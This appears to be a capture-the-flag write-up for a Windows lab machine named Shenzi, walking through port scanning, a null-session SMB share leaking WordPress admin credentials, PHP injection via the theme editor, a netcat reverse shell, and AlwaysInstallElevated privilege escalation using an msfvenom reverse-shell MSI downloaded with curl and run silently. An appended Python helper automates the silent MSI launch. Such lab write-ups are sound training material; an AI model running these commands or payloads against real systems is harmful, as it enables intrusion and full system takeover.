Machine Information
- Machine Name: Shenzi
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time: a full TCP port scan with version detection.
Nmap scan report for 192.168.206.55
Host is up, received user-set (0.020s latency).
Scanned at 2024-10-07 14:26:31 +08 for 573s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.206.55/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_ssl-date: TLS randomness does not represent time
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.206.55/dashboard/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql? syn-ack ttl 125
| fingerprint-strings:
| DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, LDAPSearchReq, NULL, RPCCheck, SSLSessionReq, TerminalServerCookie, X11Probe, drda, ibm-mqseries, informix, niagara-fox, tn3270:
|_ Host '192.168.251.206' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '192.168.251.206' is not allowed to connect to this MariaDB server
5040/tcp open unknown syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
A few things worth noting before moving on. The banner pins the stack to Apache 2.4.43 / PHP 7.4.6 on a Win64 XAMPP build, and the certificate on 443 is the stock XAMPP "localhost" certificate (1024-bit RSA, SHA-1, expired in 2019), so 443 is just 80 over TLS and not worth treating separately. MariaDB on 3306 rejects connections based on the source host, so it is not directly reachable from my box. Let's start with the web ports as usual.
Port 80
After exploring the XAMPP dashboard, there is nothing useful here, so I move on to the other ports.
Port 139/445
Since SMB is open, I check whether a null session (no credentials) lets me list or read anything.
smbclient -NL //192.168.206.55/
Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
Shenzi Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.206.55 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
There is a share named Shenzi, and it accepts the null session too.
smbclient -N //192.168.206.55/Shenzi
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 28 23:45:09 2020
.. D 0 Thu May 28 23:45:09 2020
passwords.txt A 894 Thu May 28 23:45:09 2020
readme_en.txt A 7367 Thu May 28 23:45:09 2020
sess_klk75u2q4rpgfjs3785h6hpipp A 3879 Thu May 28 23:45:09 2020
why.tmp A 213 Thu May 28 23:45:09 2020
xampp-control.ini A 178 Thu May 28 23:45:09 2020
Next I download every file from the share and go through them one by one. The interesting part of passwords.txt:
5) WordPress:
User: admin
Password: FeltHeadwallWight357
After going through all the files, it is clear that port 80 should be hosting a WordPress site, and passwords.txt hands over its admin credentials. Since the XAMPP dashboard does not link to it, the only way forward is to brute force or guess the directory that holds the WordPress install.
Port 80 (again)
I tried a common wordlist against the web root but found nothing interesting. After struggling for a while, I found the WordPress site by guessing the machine name as the path: /shenzi/.
With the credentials from passwords.txt, I log in to the WordPress admin dashboard.
Admin access to WordPress is the classic route to RCE: the theme editor writes straight to the PHP files under wp-content/themes, and anything written there is executed by the web server. Go to Appearance > Theme Editor, select the 404 Template (404.php) of the active theme and add a PHP payload to it.
After editing the file, click Update File and then browse to the edited template directly. In my case the URL is http://192.168.206.55/shenzi/wp-content/themes/twentytwenty/404.php.
That gives me code execution as the web server's user. Now it's time to spawn a reverse shell; listener on my side:
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.206.55] 51275
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\shenzi\wp-content\themes\twentytwenty>whoami
whoami
shenzi\shenzi
C:\xampp\htdocs\shenzi\wp-content\themes\twentytwenty>
The shell runs as the local user shenzi, not as NT AUTHORITY\SYSTEM, so it's time for privilege escalation.
Privilege Escalation
I run winPEAS first and look through the information it provides.
Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
Both the HKLM and HKCU values are set to 1, which is exactly what this technique needs: Windows Installer only runs packages with SYSTEM privileges when the policy is enabled in both hives, so one of them alone is not enough. This looks like the go-to method for an elevated shell. To use it, I generate a malicious MSI with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.191 lport=1235 -a x64 --platform windows -f msi -o test.msi
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: test.msi
After that, I upload it to the victim (curl ships with Windows 10) and run it through msiexec:
C:\Users\Public>curl 192.168.45.191:8001/test.msi -O
curl 192.168.45.191:8001/test.msi -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 156k 100 156k 0 0 1543k 0 --:--:-- --:--:-- --:--:-- 1560k
C:\Users\Public>msiexec /quiet /qn /i test.msi
msiexec /quiet /qn /i test.msi
The reverse shell comes back on the second listener, this time as SYSTEM because Windows Installer ran the package with elevated privileges:
rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.206.55] 51687
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
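Added example, not from the write-up: a small Python check of the AlwaysInstallElevated condition that wraps the msiexec step, so the MSI is only launched when both hives actually say 1. It assumes a Python interpreter on the Windows target (nothing on the page establishes that) and takes the MSI path from the caller; the decision helper is pure so it also runs off-target.

```python
"""Added example, not from the original write-up: verify AlwaysInstallElevated
in both hives before relying on it, then launch the MSI only when it holds.

Assumptions (not on the page): Python is available on the Windows target; the
winreg import is guarded so the pure helpers stay importable elsewhere.
"""
import subprocess

try:
    import winreg          # Windows only
except ImportError:        # not on Windows: keep the pure helpers importable
    winreg = None

INSTALLER_POLICY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"


def read_policy(hive) -> int:
    """Return the DWORD under one hive, or 0 when the key or value is absent
    (an absent value means the policy is not enabled for that hive)."""
    try:
        with winreg.OpenKey(hive, INSTALLER_POLICY) as key:
            value, kind = winreg.QueryValueEx(key, VALUE_NAME)
    except OSError:
        return 0
    return int(value) if kind == winreg.REG_DWORD else 0


def is_exploitable(hklm: int, hkcu: int) -> bool:
    """Windows Installer only elevates when the policy is 1 in BOTH hives."""
    return hklm == 1 and hkcu == 1


def check_target() -> bool:
    if winreg is None:
        raise RuntimeError("registry check must run on the Windows target")
    return is_exploitable(read_policy(winreg.HKEY_LOCAL_MACHINE),
                          read_policy(winreg.HKEY_CURRENT_USER))


def msiexec_args(msi_path: str) -> list:
    """/i install, /qn no UI. The msfvenom package runs the payload from a
    custom action and the install itself typically fails afterwards; /qn
    keeps that error dialog off the victim's desktop."""
    return ["msiexec", "/i", msi_path, "/qn"]


def install(msi_path: str) -> int:
    """Run msiexec only when the condition holds; returns msiexec's exit code."""
    if not check_target():
        raise RuntimeError("AlwaysInstallElevated is not set to 1 in both hives")
    return subprocess.run(msiexec_args(msi_path)).returncode


if __name__ == "__main__":
    import sys
    # usage: python aie.py C:\Users\Public\test.msi
    print("msiexec exit code:", install(sys.argv[1]))
```

A non-zero exit code from msiexec is normal here; what matters is whether the listener received the connection.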
Tada ~ that's how I got the SYSTEM shell.
Things I learned from this machine
- SMB is a good port to check when the web port gives nothing; a null session can expose files, as the Shenzi share did here.
- Directory brute forcing should include the machine name (or page title) in the wordlist, since it may be used as a directory name.
- Classic WordPress RCE with admin credentials through the theme editor.
- AlwaysInstallElevated privilege escalation (both the HKLM and HKCU values must be 1).